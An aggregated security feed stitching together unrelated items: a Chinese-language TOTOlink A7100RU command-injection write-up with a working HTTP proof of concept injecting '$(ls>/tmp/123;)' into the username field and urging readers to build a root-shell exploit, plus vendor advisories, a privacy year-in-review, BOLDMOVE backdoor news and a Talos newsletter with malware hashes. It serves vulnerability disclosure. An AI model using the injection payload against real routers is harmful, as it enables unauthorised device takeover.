TOTOlink A7100RU V7.4cu.2313_B20191024 was discovered to contain a command injection vulnerability via the username parameter in the setting/setOpenVpnCertGenerationCfg function.

**TOTOlink A7100RU(V7.4cu.2313\_B20191024)路由器存在命令注入漏洞****写在前面**

厂商信息：http://totolink.net/

固件下载地址：http://totolink.net/home/menu/detail/menu\_listtpl/download/id/185/ids/36.html

**1.影响版本**

图1为固件版本信息

**2.漏洞细节**

程序通过获取username参数中的内容传递给v51，之后将v51带入到Uci\_Set\_Str函数中

在Uci\_Set\_Str函数中，通过snprintf函数，将a4匹配到的内容格式化进v11，之后将v11带入cstesystem函数中

函数直接将用户输入内容带入到execv函数中，存在命令注入漏洞

**POC**

POST /cgi\-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.0.1
Content\-Length: 79
Accept: \*/\*
X\-Requested\-With: XMLHttpRequest
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Content\-Type: application/x\-www\-form\-urencoded; charset\=UTF\-8
Origin: <http://192.168.0.1>
Referer: <http://192.168.0.1/adm/status.asp?timestamp=1647872753309>
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q\=0.9
Cookie: SESSION\_ID\=2:1647872744:2
Connection: close

{"topicurl":"setting/setOpenVpnCertGenerationCfg",
"username":"1$(ls>/tmp/123;)"}

复现结果如下

图2 POC攻击效果

最后，您可以编写exp，这可以实现获得根shell的非常稳定的效果

CVE-2022-48126: ttt/12 at main · Am1ngl/ttt

In 2022, privacy was upended for millions of people. Here are the biggest stories from last year. 



(Read more...)




The post What happened in privacy in 2022 appeared first on Malwarebytes Labs.

Annual reviews of any year’s developments in privacy rarely lend themselves to pithy wrap-ups, but 2022 was different, providing the clearest example yet for so many people—American women in particular—that their privacy was not theirs to determine, and that the often-repeated refrain that privacy doesn’t matter for those who have “nothing to hide” only holds sway until the world around those words decides: “Now you do_._”

The US Supreme Court’s decision to overturn _Roe v. Wade_ and the associated Constitutional right to choose to have an abortion redefined personal privacy, as individual states can now treat previously benign health data as possible evidence in a criminal investigation. Where perhaps millions of women previously had “nothing to hide,” now, they do.

The Supreme Court’s decision was also an event that has few modern equivalents, changing the behaviors of three, core parts of society—government, corporate, and public.

In the wake of a leaked draft of the decision, Federal legislators introduced a new, targeted data privacy bill to protect reproductive health data. Immediately following the decision, countless individuals dropped their current period-tracking apps in search for another app that would promise to better protect their data. And months after the decision, companies are still announcing changes to what types of data they will no longer store.

In looking back at 2022, it isn’t that nothing else happened in data privacy—it’s that nothing else like this has happened for a long time.

Here’s a look at what happened in privacy in 2022.

****Roe v. Wade overturned****

The privacy fallout from the US Supreme Court’s decision in _Dobbs v. Jackson Women’s Health Organization_ is both succinct and enormous: It changed what people want to keep private. 

By allowing a state-by-state approach to the legality of obtaining and providing abortion services, the US Supreme Court’s decision introduced a new uncertainty about what types of online activity—be it Google searches, Facebook posts, TikTok videos, or location histories revealing trips to an abortion clinic—could now be considered as potential evidence of a crime.

Would law enforcement, for example, be able to pull Google search requests on someone they suspected of seeking an abortion? Would text messages between friends be brought before an investigator? What about Instagram stories that included offers to pay for the travel and lodging of complete strangers seeking abortion from other states? And what about period-tracking app data? What if cops could see in a person’s data that, for a week or two, they were pregnant, and then soon after, they were not? 

In the absence of immediate best practices, individuals made their own choices. Period-tracking app users scrambled to find the most secure app online, and one period-tracking app maker promised to encrypt user data so that, even if law enforcement made a request for their data, the data would be unintelligible. (Those promises, one investigation found, were shaky.)

But it wasn’t just period-tracking apps that reconsidered data collection and storage policies.

In July, Google announced that it would automatically delete location histories that revealed physical trips to any sensitive locations, which Google defined as “medical facilities like counseling centers, domestic violence shelters, abortion clinics, fertility centers, addiction treatment facilities, weight loss clinics, \[and\] cosmetic surgery clinics.” Samsung, too, recently announced that it would delete “Women’s health data” collected through Samsung Health.

To address this corporate, piecemeal approach to user privacy, Congressmembers introduced the My Body, My Data Act, which would place new, national restrictions on how companies handle reproductive health data.

****Web wins (and one wayward rollout)****

When the developers of the privacy-forward browser Brave released their own search engine last year, they touted that, unlike other search engines, “Brave Search” would pull from an entirely separate index of the Internet, only relying on Google’s index when it could not fill in the gaps for user searches. Upon Brave Search’s launch, this “independence score,” as the company put it, was 87 percent.

One year later, that score has reportedly increased to 92 percent for all Brave Search users, and Brave Search itself has exited out of beta. But perhaps the biggest privacy draw of all for the tool is simple: It doesn’t track users or their searches.

Privacy-minded users has another choice in web browsers last year, as well, as Mozilla claimed that a new feature in Firefox made it the “most private and secure major browser available across Windows, Mac, and Linux.”

The feature, called Total Cookie Protection, promises to create “cookie jars” for every website that users visit. This will reportedly put browsing activity into separate silos so that user activity cannot be stitched together across websites, which is often done to help build in-depth profiles of who to target with ads.

But why spend so much time on cookie restrictions when, according to Google’s own words several years ago, it, too, would retire third-party tracking in its browser, Chrome?

Probably because that major rollout was delayed yet again—this time to 2024.

****A question of corporate commitment to privacy****

If you can believe it, there was a time last year when the biggest thing happening to Twitter had nothing to do with its new owner, Elon Musk.

In August, the company confirmed a data breach that affected 5.4 million users, their email addresses and phone numbers now linked to their accounts in a data dump that could be found for sale on the dark web.

In May, Twitter was also hit with a $150 million fine from the US Federal Trade Commission for violating an earlier consent order that prohibited the company from “misleading consumers about the extent to which it protects the security, privacy, and confidentiality of nonpublic consumer information, including the measures it takes to prevent unauthorized access to nonpublic information and honor the privacy choices made by consumers.”

But with so broad a description, what, exactly, did Twitter do?

It used phone numbers that were specifically requested for two-factor authentication—a security measure—for targeted advertising.

(At least the company did put its services on Tor last year, a great step for familiarizing users with a more private online experience.)

_To learn more about privacy and Tor’s security benefits to the Internet, listen to our Lock and Code podcast interview with Alec Muffet here._

But privacy blunders—and intentional evasions—have become a guarantee in Silicon Valley, and so Twitter shouldn’t receive all the spotlight.

Facebook, possibly angered by one browser’s decision to remove tracking parameters that Facebook inserted into URLs to help track users across pages, decided to encrypt their URLs so that the browser in question could no longer determine which part of the URL would need to be removed. The company is also facing a lawsuit alleging that it has built a “secret workaround” to safeguards built into the iPhone to prevent the social media giant from tracking users.         

Finally, Google settled multi-state charges that the company had allegedly misled users as to how their locations were tracked across various services, agreeing to pay a whopping $391.5 million. A separate but similar lawsuit is still active against the company.

****Legislation and legal violation****

Compared to earlier years, the legislative battle for data privacy cooled off in 2022, but that doesn’t mean it was necessarily less spirited.

In June, a draft of the US Supreme Court’s opinion in _Dobbs v. Jackson Women’s Health Organization_ was leaked, suggesting that the Court was positioned to soon overturn both _Roe v. Wade_ and _Planned Parenthood v. Casey_, previous decisions that had guaranteed a Constitutional right to choose to have an abortion. 

Before the Supreme Court could issue its final decision, legislators in Washington DC moved fast, introducing the My Body, My Data Act in both the House of Representatives and the Senate. The bill sought to place new restrictions on how companies use “personal reproductive or sexual health information,” allowing for the collection, use, retainment, and disclosure of such data only if a company was delivering a service requested by a user, or if the user gave express consent. The definition of “personal reproductive or sexual health information” in the bill is broad, including any info that could reveal someone’s attempts to “research or obtain” reproductive health service, along with any reproductive or sexual health “conditions,” including pregnancy or menstruation.

The bill has not significantly moved forward since its introduction.

Separately, last year saw the introduction of the American Data and Privacy Protection Act—the latest attempt from Congressmembers to pass a Federal, comprehensive data privacy law for the United States. Like many attempts before, the American Data and Privacy Protection Act would extend the rights to access, correct, and request deletion of the personal data that companies have already collected on them—similar to the rights granted to those living in the European Union through the General Data Protection Regulation (GDPR).

With a new Congress elected, it is unclear whether the bill will progress.

Aside from legislation that has only been introduced, one full-blown law scored its first-ever enforcement action. In California, the state’s attorney general announced a settlement with the makeup company Sephora over allegations that it violated the California Consumer Privacy Act, the state’s privacy law that was first passed in 2018.

According to the Office of the Attorney General, Sephora allegedly “failed to disclose to consumers that it was selling their personal information, … failed to process user requests to opt out of sale via user-enabled global privacy controls in violation of the CCPA, and … it did not cure these violations within the 30-day period currently allowed by the CCPA.”

Per the settlement, Sephora agreed to pay $1.2 million.

****Pushing back against stalkerware****

Rounding out a turbulent year, there was some good news in the continued fight against stalkerware.

Through a months-long investigation, the technology publication TechCrunch revealed that a network of stalkerware-type apps all shared the same security vulnerability that could allow “near-unfettered remote access” to the data of hundreds of thousands of devices that are already infected with said apps. TechCrunch worked with the Carnegie Mellon University Software Engineering Institute to both report the vulnerability and contact any party that could responsibly address the vulnerability. The investigation provided likely the strongest, global “map” of who is providing cover for these types of apps, and how they seem to skirt any consequences.

But there’s more.

Following questions that TechCrunch sent to a company called 1Byte, which operates the server infrastructure behind several of the apps under investigation, two of the apps “appeared to cease working or shut down.” 

Today, TechCrunch offers a tool that allows people to see if their devices are infected with the apps that the publication previously investigated.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

What happened in privacy in 2022

Dell EMC PV ME5, versions ME5.1.0.0.0 and ME5.1.0.1.0, contains a Client-side desync Vulnerability. An unauthenticated attacker could potentially exploit this vulnerability to force a victim's browser to desynchronize its connection with the website, typically leading to XSS and DoS.

**Artikkelin sisältö**

**Vaikutus**

High

**Tiedot**

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-23691

Dell PV ME5 versions ME5.1.0.0.0 and ME5.1.0.1.0 contain a Client-side desync Vulnerability. An unauthenticated attacker may potentially exploit this vulnerability to force a victim's browser to desynchronize its connection with the website, typically leading to XSS and DoS. 

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

**Proprietary Code CVEs**

**Description**

**CVSS Base Score**

**CVSS Vector String**

CVE-2023-23691

Dell PV ME5 versions ME5.1.0.0.0 and ME5.1.0.1.0 contain a Client-side desync Vulnerability. An unauthenticated attacker may potentially exploit this vulnerability to force a victim's browser to desynchronize its connection with the website, typically leading to XSS and DoS. 

8.1

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Dell Technologies suosittelee, että kaikki asiakkaat ottavat huomioon sekä CVSS-peruspistemäärän että kaikki asiaankuuluvat väliaikaiset ja ympäristöön liittyvät pisteet, jotka voivat vaikuttaa tietyn tietoturvahaavoittuvuuden mahdolliseen vakavuuteen.

**Tuotteet, joihin asia vaikuttaa ja tilanteen korjaaminen**

**Product**

**Affected Versions**

**Updated Versions**

ME5012, ME5024, and ME5084

Versions before ME5.1.1.0.5

ME5.1.1.0.5

**Product**

**Affected Versions**

**Updated Versions**

ME5012, ME5024, and ME5084

Versions before ME5.1.1.0.5

ME5.1.1.0.5

**Kiitokset**

Dell Technologies would like to thank KEN PYLE, EXPLOIT DEVELOPER & PARTNER AT CYBIR / GRADUATE PROFESSOR AT CHESTNUT HILL COLLEGE for reporting this issue.  
 

**Versiohistoria**

Revision

Date

Description

1.0

2023-01-17

Initial Release

**Asiaan liittyvät tiedot**

Dell Security Advisories and Notices  
Dell Vulnerability Response Policy  
CVSS Scoring Guide

**Artikkelin ominaisuudet**

**Tuote, johon asia vaikuttaa**

PowerVault MD Storage Arrays Management Pack Versions for Microsoft System Center Operations, PowerVault, MD Series, ME Series, NX Series, Tape Backup & Recovery, PowerVault MD Storage Arrays Management Pack , Dell MD Storage Array Management Pack Suite Version 5.0 For Microsoft System Center Operations, Dell MD Storage Arrays Management Pack Suite v6.0 for Microsoft System Center Operations Manager, Dell MD Storage Arrays Management Pack Suite v6.1 for Microsoft System Center Operations Manager, Dell PowerVault MD Storage Arrays Management Pack Version 4.0 for Microsoft System Center Oper Mangr, Dell PowerVault MD Storage Arrays Management Pack Version 4.1 for Microsoft System Center Oper Mngr, Dell PowerVault MD3000 with Red Hat Enterprise Linux HA Clusters, Dell PowerVault MD3000 with Windows HA Clusters, Dell PowerVault MD3000i with Windows HA Clusters, Dell PowerVault MD3200/MD3220-Windows HA Cluster, Dell PowerVault MD3200i and MD3220i with Windows HA Clusters, Dell PowerVault MD3600f/3620f Windows HA Cluster, Dell PowerVault MD3600i/3620i Windows HA Cluster, Dell EMC ML3, Dell PowerVault OEM Ready MD34XX and MD38XX, PowerVault 100T DAT72, PowerVault 100T DDS3 (Tape Drive), PowerVault 100T TR40, PowerVault 110T DLT7000 (Tape Drive), 110T DLT1 Drive, 110T DLT4000 Cartridge Tape Subsystem, PowerVault 110T LTO2-L, PowerVault 110T LTO3, PowerVault 110T VS160, PowerVault 110T DLT VS80 (Tape Drive), PowerVault 112T 1U (Tape Enclosure), PowerVault 114X Tape Rack Enclosure, PowerVault 120T DDS4 (Autoloader), PowerVault 120T DLT4000 (Autoloader), PowerVault 120T DLT7000 (Autoloader), PowerVault 122T DLT VS80 (Autoloader), PowerVault 124T, PowerVault 130T DLT (Tape Library), PowerVault 210S (SCSI), PowerVault 211S (SCSI), PowerVault 220S (SCSI), PowerVault 221S (SCSI), PowerVault 224F (Fibre Channel Expansion), PowerVault 250F (Fibre Channel), PowerVault 251F (Fibre Channel), PowerVault 35F (Fibre Channel Bridge), PowerVault 50F (Fibre Channel Switch), PowerVault 51F (8P Fibre Channel Switch), PowerVault 530F (SAN Appliance), PowerVault 56F (16P Fibre Channel Switch), PowerVault 57F, PowerVault 630F (Fibre Channel Expansion), PowerVault 650F (Fibre Channel RAID), PowerVault 651F (Fibre Channel), PowerVault 660F (Fibre Channel RAID), PowerVault 700N, PowerVault 701N (Deskside NAS Appliance), PowerVault 715N (Rackmount NAS Appliance), PowerVault 725N (Rackmount NAS Appliance), PowerVault 735N (Rackmount NAS Appliance), PowerVault 745N, PowerVault 750N (Deskside NAS Appliance), PowerVault 755N (Rackmount NAS Appliance), PowerVault 770N (Deskside NAS Appliance), PowerVault 775N (Rackmount NAS Appliance), PowerVault 720N, 740N, and 760N (Filers), PowerVault 120T DDS3 (Autoloader), Dell DL1000, PowerVault DL2000, PowerVault DL2100, PowerVault DL2200 CommVault, PowerVault DL2200, Powervault DL2300, Dell DL4000, PowerVault 120T DLT1 (Autoloader), PowerVault DP100, PowerVault DP500, PowerVault DP600, Dell DR2000v, Dell DR4100, Dell DR6000, PowerVault DX6104, PowerVault DX6112, PowerVault 100T (IDE Tape Drive), POWER VAULT 114X LTO5 140, PowerVault 110T LTO (Tape Drive), PowerVault 122T LTO (Autoloader), PowerVault 128T LTO/SDLT (Tape Library), PowerVault 132T LTO/SDLT (Tape Library), PowerVault 136T LTO/SDLT (Tape Library), PowerVault 110T LTO2 (Tape Drive), PowerVault 122T LTO2 (Autoloader), PowerVault 160T LTO2 (Tape Library), PowerVault LTO3-060, PowerVault LTO3-080, PowerVault LTO4-120HH, PowerVault LTO5-140, Powervault LTO6, PowerVault LTO7, PowerVault LTO8, PowerVault LTO9, PowerVault 200S (SCSI), PowerVault 201S (SCSI), PowerVault MD1000, PowerVault MD1120, PowerVault MD1200, PowerVault MD1220, PowerVault MD3000, PowerVault MD3000i, PowerVault MD3060e, PowerVault MD3200, PowerVault MD3200i, PowerVault MD3220, PowerVault MD3220i, PowerVault MD3260, PowerVault MD3260i, PowerVault MD3400, PowerVault MD3420, PowerVault MD3460, PowerVault MD3600f, PowerVault MD3600i, PowerVault MD3620f, PowerVault MD3620i, PowerVault MD3660f, PowerVault MD3660i, PowerVault MD3800f, PowerVault MD3800i, PowerVault MD3820f, PowerVault MD3820i, PowerVault MD3860f, PowerVault MD3860i, Dell EMC PowerVault ME4012, Dell EMC PowerVault ME4024, Dell EMC PowerVault ME4084, Dell EMC PowerVault ME412 Expansion, Dell EMC PowerVault ME424 Expansion, Dell EMC PowerVault ME484, PowerVault ME5012, PowerVault ME5024, PowerVault ME5084, PowerVault ML6000, PowerVault NF100, PowerVault NF500, PowerVault NF600, PowerVault NX1950, PowerVault NX200, PowerVault NX300, PowerVault NX3000, PowerVault NX3100, PowerVault NX3200, PowerVault NX3300, PowerVault NX3500, PowerVault NX3600, PowerVault NX3610, Powervault NX400, PowerVault RD1000, PowerVault Storage Area Network (SAN), PowerVault 110T SDLT220 (Tape Drive), PowerVault 110T SDLT320 (Tape Drive), PowerVault 122T SDLT 320 (Autoloader), PowerVault TL2000, PowerVault TL4000, Product Security Information, Dell Storage MD1280, Dell Storage MD1400, Dell Storage MD1420, Dell Storage NX3230, Dell EMC Storage NX3240, Dell Storage NX3330, Dell EMC Storage NX3340, Dell Storage NX430, Dell EMC NX440, PowerVault TL1000 ...

**Edellinen julkaisupäivä**

18 tammik. 2023

**Versio**

2

**Artikkelin tyyppi**

Dell Security Advisory

CVE-2023-23691: DSA-2023-018: Dell PowerVault ME5 Security Update for a Client Desync Attack Vulnerability

A vulnerability exists in Trend Micro Maximum Security 2022 (17.7) wherein a low-privileged user can write a known malicious executable to a specific location and in the process of removal and restoral an attacker could replace an original folder with a mount point to an arbitrary location, allowing a escalation of privileges on an affected system.

**LAST UPDATED: DEC 30, 2022**

**Release Date:** December 30, 2022

**CVE Vulnerability Identifier:** CVE-2022-48191

**Platform(s):** Microsoft Windows

**Summary**

Trend Micro has released a hotfix for Trend Micro Maximum Security 2022 which resolves a security time-of-check time-of-use local privilege escalation vulnerability.

**Affected version(s)**

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Maximum Security

2022 (v17.7)

Microsoft Windows

English

**Solution**

Trend Micro has released a hotfix available for version below that resolves the issue:

PRODUCT

AFFECTED VERSION(S)

PLATFORM

LANGUAGE(S)

Trend Micro Maximum Security

2022 (v17.7) Hotfix

Microsoft Windows

English

**Vulnerability Details**

This hotfix resolves a vulnerability in the product wherein a low-privileged user can write a known malicious executable to a specific location and in the process of removal and restoral an attacker could replace an original folder with a mount point to an arbitrary location, allowing a escalation of privileges on an affected system.

Trend Micro has received no reports nor is aware of any actual attacks against the affected products related to this vulnerability at this time.

**Mitigating Factors**

None identified. Customers are advised to ensure they always have the latest version of the program.

**Acknowledgement**

Trend Micro would like to thank **Simon Zuckerbraun** for responsibly disclosing this issue and working with Trend Micro to help protect our customers.

**Additional Assistance**

Customers who have questions are encouraged to contact Trend Micro Technical Support for further assistance.

**External Reference**

*   ZDI-CAN-18291

How helpful was this article?

*   It wasn't helpful at all.
*   Somewhat helpful.
*   Just okay.
*   It was somewhat helpful.
*   It was helpful.

*   \*Feedback submitted will only be used as reference for future product, service and article improvements.

CVE-2022-48191: Security Bulletin: Trend Micro Maximum Security Time-Of-Check Time-Of-Use Local Privilege Escalation Vulnerability

A suspected China-nexus threat actor exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.
Telemetry evidence gathered by Google-owned Mandiant indicates that the exploitation occurred as early as October 2022, at least nearly two months before fixes were

Firewall / Network Security

A suspected China-nexus threat actor exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.

Telemetry evidence gathered by Google-owned Mandiant indicates that the exploitation occurred as early as October 2022, at least nearly two months before fixes were released.

"This incident continues China's pattern of exploiting internet facing devices, specifically those used for managed security purposes (e.g., firewalls, IPS\\IDS appliances etc.)," Mandiant researchers said in a technical report.

The attacks entailed the use of a sophisticated backdoor dubbed **BOLDMOVE**, a Linux variant of which is specifically designed to run on Fortinet's FortiGate firewalls.

The intrusion vector in question relates to the exploitation of CVE-2022-42475, a heap-based buffer overflow vulnerability in FortiOS SSL-VPN that could result in unauthenticated remote code execution via specifically crafted requests.

Earlier this month, Fortinet disclosed that unknown hacking groups have capitalized on the shortcoming to target governments and other large organizations with a generic Linux implant capable of delivering additional payloads and executing commands sent by a remote server.

The latest findings from Mandiant indicate that the threat actor managed to abuse the vulnerability as a zero-day to its advantage and breach targeted networks for espionage operations.

"With BOLDMOVE, the attackers not only developed an exploit, but malware that shows an in-depth understanding of systems, services, logging, and undocumented proprietary formats," the threat intelligence firm said.

The malware, written in C, is said to have both Windows and Linux variants, with the latter capable of reading data from a file format that's proprietary to Fortinet. Metadata analysis of the Windows flavor of the backdoor show that they were compiled as far back as 2021, although no samples have been detected in the wild.

BOLDMOVE is designed to carry out a system survey and is capable of receiving commands from a command-and-control (C2) server that in turn allows attackers to perform file operations, spawn a remote shell, and relay traffic via the infected host.

An extended Linux sample of the malware comes with extra features to disable and manipulate logging features in an attempt to avoid detection, corroborating Fortinet's report.

"The exploitation of zero-day vulnerabilities in networking devices, followed by the installation of custom implants, is consistent with previous Chinese exploitation of networking devices," Mandiant noted.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Chinese Malware Spotted Exploiting Recent Fortinet Firewall Vulnerability

Buffer overflow in function Notepad_plus::addHotSpot in Notepad++ v8.4.3 and earlier allows attackers to crash the application via two crafted files.

****CVE-2022-31901****

*   Denial Of Services (DOS) in Notepad++(x86) in 8.4.3 and before.

****Description****

*   Vulnerability triggering, via opening two specially crafted text files (e.g. first.txt & second.txt) as input to notepad++.

As an illustrative example below, as of 11/07/2022, latest version of Notepad++(x86) is 8.4.3 is used. 

**Proof of Concept -**

*   Open the two example input files first.txt & second.txt in Notepad++ in any order.

**Result :**

**Visual Studio 2019 Dump Analysis**

Here we can see the problem to parse these files in **ScintallComponent -> Editor.h -> Line number 690.**

**Root Cause Analysis**

*   When notepad++ opens any file it calls a function **notepad\_plus::addHotSpot** which creates heap memory with **new** operator and stores the return address in **widetext** variable TCHAR *wideText = new TCHAR[endPos - startPos + 1];. Since it requests for large allocation, **new** returns **bad\_alloc** which is not handled in notepad++ and results in DoS.
    
*   So it can be said that, opening the two example files with Notepad++(x86) <= 8.4.3 is leading to Denial of Service.
    

**Tested Versions**

The vulnerability is tested to work on following version:

*   Notepad++ 8.3.2 32-bit
*   Notepad++ 8.3.3 32-bit.
*   Notepad++ 8.4.0 32-bit.
*   Notepad++ 8.4.1 32-bit.
*   Notepad++ 8.4.2 32-bit.
*   Notepad++ 8.4.3 32-bit.

**Tested Environment**

*   Windows 11 - 22563.1000 64 bit
*   Windows 10 - 10.0.19042.1586 64-bit
*   Windows 10 - 10.0.19044.1706 64-bit

**Update**

*   As of 05-01-2023, this issue still persists in the Notepad++ versions 8.4.8 (32-bit) and before.

CVE-2022-31901: GitHub - CDACesec/CVE-2022-31901

Talent retention and institutional knowledge go hand in hand. Both are critical to ensuring the security of your network environment.

Thursday, January 19, 2023 16:01

Welcome to this week’s edition of the Threat Source newsletter.

Talent retention and institutional knowledge go hand in hand. Both are critical to ensuring the security of your network environment. To that end, I want to talk briefly about why talent retention isn’t just about money. So I am going to speak directly to the people managers from the team leads in the SOC to the C-Level execs. When you examine what you do on a day-to-day basis are you telling your team members what they can and can’t do? How often do the things you say and the goals you provide fall between those two things? Now, ask yourself what you’ve done to enable them to grow today, both technically and as people. One of the easiest ways to very quickly identify quality leadership is to find out if the mindset and actions of the people managers is that the employees work for and reflect on them, or if they understand that they work for the team and that the team is a reflection of their leadership. Yes, there are plenty of employees that will leave simply based on pay, and we all have budgets to work within – but there is no cost to show respect and fighting to find budget for pet projects, training, or even niche learning for your employees is your job. When you can’t find budget find other ways to show the employees that you respect them and are actively working to ensure their growth. In the end your efforts will be rewarded with a stronger team and a more secure environment.

**The one big thing**

Focus on the basics. As we run headlong into the impending brick wall of 2023 take a moment to look at your environment and simply relearn it.

**Why do I care?**

Without knowing your baseline environment there is absolutely no way that you can expect to protect it.

**So now what?**

Learn your network. Observe and reevaluate your physical security standards in this crazy post pandemic world. Ensure that your patch management strategy is sound and that you have good cross-team collaboration to get those change windows handled. Ensure dead accounts are handled correctly. On and on – you know the steps. Take a beat and follow them.

**Top security headlines of the week**

Yum Brands, the parent company of fast-food chains KFC, Pizza Hut and Taco Bell, has confirmed that company data was stolen in a ransomware attack.

Yum Brands said a ransomware attack impacted “certain information technology systems,” prompting the chain to take some of its systems offline. The incident also led to the closure of roughly 300 restaurants in the United Kingdom for 24 hours, the company said. Although the ransomware attack largely affected the company’s U.K. operations, Yum Brands said it notified U.S. federal law enforcement as its investigation continues. (Tech Crunch and Yum)

Initial Access Broker market is booming, posing growing threat to enterprises. Research shows a sharp year-over-year growth in the number of IABs operating in underground forums and markets. For ransomware operators and other cybercriminals that are looking for quick access to enterprise networks, these brokers are the answer. (Dark Reading and GroupIB)

**Can’t get enough Talos?**

*   https://blog.talosintelligence.com/following-the-lnk-metadata-trail/
*   https://blog.talosintelligence.com/talos-year-in-review-2022/
*   https://talosintelligence.com/podcasts/shows/beers\_with\_talos
*   https://talostakes.talosintelligence.com/2018149/12016411-year-in-review-apt-summary-edition

**Upcoming events where you can find Talos**

CactusCon (Jan 27-28)  
Mesa, AZ

Cisco Live Amsterdam (Feb 6-10)  
Amsterdam, Netherlands

**Most prevalent malware files from Talos telemetry over the past week**

SHA 256:  
9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Typical Filename: VID001.exe  
Detection Name: Simple\_Custom\_Detection

SHA 256:  
1077bff9128cc44f98379e81bd1641e5fbaa81fc9f095b89c10e4d1d2c89274d  
MD5: 26f927fb7560c11e509f0b8a7e787f79  
Typical Filename: Iris QuickLinks.exe  
Claimed Product: N/A  
Detection Name: W32.File.MalParent

SHA 256:

125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645  
MD5: 2c8ea737a232fd03ab80db672d50a17a  
Typical Filename: LwssPlayer.scr  
Claimed Product: 梦想之巅幻灯播放器  
Detection Name: Auto.125E12.241442.in02

SHA256:  
e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934  
MD5: 93fefc3e88ffb78abb36365fa5cf857c  
Typical Filename: Wextract  
Claimed Product: Internet Explorer  
Detection Name: PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg

Threat Source newsletter (Jan. 19, 2023): Talent retention and institutional knowledge

The "BoldMove" backdoor demonstrates a high level of knowledge of FortiOS, according to Mandiant researchers, who said the attacker appears to be based out of China.

Researchers analyzing data associated with a recently disclosed zero-day vulnerability in Fortinet's FortiOS SSL-VPN technology have identified a sophisticated new backdoor specifically designed to run on Fortinet's FortiGate firewalls.

The malware appears to be the work of a China-based threat actor engaged in cyber-espionage operations targeting government organizations and those working with these organizations. It is the latest example of adversaries from the country targeting firewalls, IPS, IDS, and other Internet-facing technologies that enterprises use for securing their networks, Mandiant said in a report this week.

Researchers from the company came across the malware in a public repository in December and were able to tie it to the Fortinet zero-day bug (CVE-2022-42475) based on information that Fortinet released in its initial vulnerability disclosure. The vulnerability allows an unauthenticated attacker to execute arbitrary code on affected systems and is present in multiple versions of Fortinet's FortiOS and FortiProxy technologies. When Fortinet disclosed the vulnerability, the company said it was aware of at least one incident where an attacker had exploited the flaw in the wild.

**BoldMove Backdoor**

Mandiant said the malware it discovered in December — and is tracking as "BoldMove" — is associated with the exploitation of CVE-2022-42475. Available telemetry suggests that exploit activity associated with the malware was occurring as early as October 2022. Targets have included a government entity in Europe and a managed services provider in Africa.

The BoldMove backdoor, written in C, comes in two flavors: a Windows version and a Linux version that the threat actor appears to have customized for FortiOS, Mandiant said. When executed, the Linux version of the malware first attempts to connect to a hardcoded command-and-control (C2) server. If successful, BoldMove collects information about the system on which it has landed and relays it to the C2. The C2 server then relays instructions to the malware that ends with the threat actor gaining full remote control of the affected FortiOS device.

Ben Read, director of cyber-espionage analysis at Mandiant, says some of the core functions of the malware, such as its ability to download additional files or open a reverse shell, are fairly typical of this type of malware. But the customized Linux version of BoldMove also includes capabilities to manipulate specific features of FortOS.

"The implementation of these features shows an in-depth knowledge of the functioning of Fortinet devices," Read says. "Also notable is that some of the Linux variants features appear to have been rewritten to run on lower-powered devices."

The adversary appears to have compiled the Windows version of BoldMove sometime in 2021, or well before the Linux version. Mandiant so far has not detected any exploit activity in the wild associated with that version. "The Windows sample we have is 32-bit, so \[it\] should run on most modern versions of Windows but could be compiled to run on 64-bit machines," Read says. It would not run on a Fortinet device, however.

**Tech Chops**

The new cyber-espionage campaign and the BoldMove malware that the attackers are using in the campaign continue a pattern among China-based threat actors — and advanced persistent threats from other nations as well — to target firewalls, IPS, IDS, and other network security devices.

Developing exploits for these technologies can be challenging and require substantial resources and technical chops.

With BoldMove, "the attackers not only developed an exploit, but malware that shows an in-depth understanding of systems, services, logging, and undocumented proprietary formats," Mandiant said. But the payoff for attackers can be high because a successful exploit gives them wide access to a network, without requiring any user interaction, the security vendor added.

While Fortinet's products have been an especially popular target in this regard, threat actors have targeted products from other vendors as well, including Pulse Secure VPNs, Citrix ADCs, and SonicWall. The attacks have prompted multiple advisories from the FBI, the US Cybersecurity and Information Security Agency (CISA), and others.

**Schooled in FortiOS**

Meanwhile, Fortinet itself last week described the malware associated with CVE-2022-42475 as a variant of a "generic" Linux backdoor that the threat actor has customized for FortiOS. The company said its analysis showed the malicious file may have been masquerading as a component of Fortinet's IPS engine on compromised systems.

Among the malware's more advanced features was one for manipulating FortiOS logging to avoid detection, Fortinet said. The malware can look for event logs in FortiOS, to decompress them in memory and search for and delete a specific string that enables it to reconstruct the logs. The malware can also shut down logging processes entirely.

"The complexity of the exploit suggests an advanced actor and that it is highly targeted at governmental or government-related targets," Fortinet said.

According to Fortinet, developing the exploit would have required the threat actor to have a "deep understanding" of FortiOS and the underlying hardware. "The use of custom implants shows that the actor has advanced capabilities, including reverse-engineering various parts of FortiOS," the vendor said.

Attackers Crafted Custom Malware for Fortinet Zero-Day

SLIMS version 9.5.2 suffers from a cross site scripting vulnerability.

